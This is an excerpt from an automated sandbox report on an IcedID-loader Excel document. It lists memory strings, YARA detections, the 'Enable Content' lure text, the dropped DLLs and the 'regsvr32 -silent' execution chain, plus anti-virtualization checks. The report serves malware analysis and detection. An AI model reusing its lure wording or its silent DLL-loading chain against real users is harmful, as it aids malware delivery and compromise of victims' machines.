        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1V14NYAS7A06VC7HKS2ERX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D1678 NtQuerySystemInformation,3_2_020D1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00131678 NtQuerySystemInformation,4_2_00131678
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D18103_2_020D1810
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB15D03_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB41BF3_2_000007FEF8FB41BF
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001318104_2_00131810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F915D04_2_000007FEF8F915D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F941BF4_2_000007FEF8F941BF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\XRAY.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.20d0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.130000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 5.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 5.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 5.2.regsvr32.exe.130000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@15/6
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DeliveryConf535215.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD307.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: DeliveryConf535215.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: DeliveryConf535215.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: DeliveryConf535215.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: DeliveryConf535215.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: XRAY.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D1E50 3_2_020D1E50
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00131E50 4_2_00131E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
